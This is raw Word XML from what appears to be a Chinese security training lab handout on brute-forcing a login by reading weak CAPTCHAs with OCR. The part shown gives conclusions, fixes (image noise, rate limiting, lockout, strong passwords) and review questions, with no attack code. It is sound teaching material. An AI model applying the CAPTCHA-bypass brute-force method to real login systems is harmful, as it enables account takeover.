    <w:p w14:paraId="58395EED" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="482"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>拓展对照</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="48743C70" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>验证码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>改为</w:t>
      </w:r>
      <w:r>
        <w:t>mode=normal</w:t>
      </w:r>
      <w:r>
        <w:t>，图片带干扰，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OCR </w:t>
      </w:r>
      <w:r>
        <w:t>识别失败，爆破无法成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF6546" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_21"/>
      <w:r>
        <w:t>实验核心结论（写入实验报告）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="4DCB4C13" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>本漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>不是后端校验逻辑漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>，而是验证码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>图像强度过低</w:t>
      </w:r>
      <w:r>
        <w:t>，可被机器识别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402B3A3" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>即使验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>码设置</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>一次性失效，仍然可以被全自动脚本绕过爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE90D2" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>只依靠一次性验证码无法防护暴力破解，必须搭配图片干扰、频率限制、强密码策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E5F01" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_22"/>
      <w:r>
        <w:t>漏洞修复方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="0D1AF61D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>码图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>增加噪点、干扰线、字符扭曲、缩放，提升</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>识别难度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E3D87" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>登录接口增加访问频率限制、账号锁定机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840CCDF" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>后台高权限账号强制开启强密码策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59920F" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>接入专业人机行为验证（极验、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>腾讯防水墙</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EA6C5" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_23"/>
      <w:r>
        <w:t>实训思考题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="445C0BF4" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:t>（验证码复用）和实验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OCR </w:t>
      </w:r>
      <w:r>
        <w:t>自动识别）的攻击原理有什么本质区别？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1F066" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>为什么带干扰的验证码可以防御本次爆破攻击？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640CB1A" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>除了验证码加固，还有哪些方式可以防护账号密码暴力破解？</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002E484B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9DE9BA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="009975F7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="45779E45" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0099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0A8D9" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="002E48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523D3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="009975F7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17E77D60" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0099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1B2D5" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="002E48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239341B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9239341B"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9288B902"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9288B902"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="￮"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="97CACDE2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="97CACDE2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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="AE4D1D31"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE4D1D31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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B5E306ED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5E306ED"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="BF205925"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF205925"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C5FF79AB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C5FF79AB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CCE61598"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CCE61598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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="CF092B84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF092B84"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="D1CE3026"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D1CE3026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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0053208E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0053208E"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0248C179"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0248C179"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03D62ECE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03D62ECE"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E640482"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E640482"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="￮"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="119F6DF7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="119F6DF7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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="25B654F3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25B654F3"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29E93AF0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="29E93AF0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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46A08BB8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46A08BB8"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="￮"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="59ADCABA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59ADCABA"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="629F7852"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="629F7852"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="￮"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="663D5A1D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="663D5A1D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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B57B1A4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6B57B1A4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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6DEB9A5E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DEB9A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20E289E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="720E289E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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="72183CF9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72183CF9"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="14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84B"/>
    <w:rsid w:val="002E484B"/>
    <w:rsid w:val="009975F7"/>
    <w:rsid w:val="3CA4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4EECF-3616-4CF2-A23C-55AD0183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ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:next w:val="a"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ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:next w:val="a"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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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eastAsia="黑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rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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LTSC</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-22T03:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-22T07:11:00Z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{"Label":"1","ContentProducer":"001191110102MACQD9K64010000","ProduceID":"7688195800492854502","ReservedCode1":"","ContentPropagator":"","PropagateID":"","ReservedCode2":""}</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNzY2ZjAyN2JjMDBhNTk3ZWY1YmM2YzE2NGFhZDc3ODYiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==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DCB14CC5151C4A999C850FC3CFF2E4AC_12</vt:lpwstr>
  </property>
</Properties>
</file>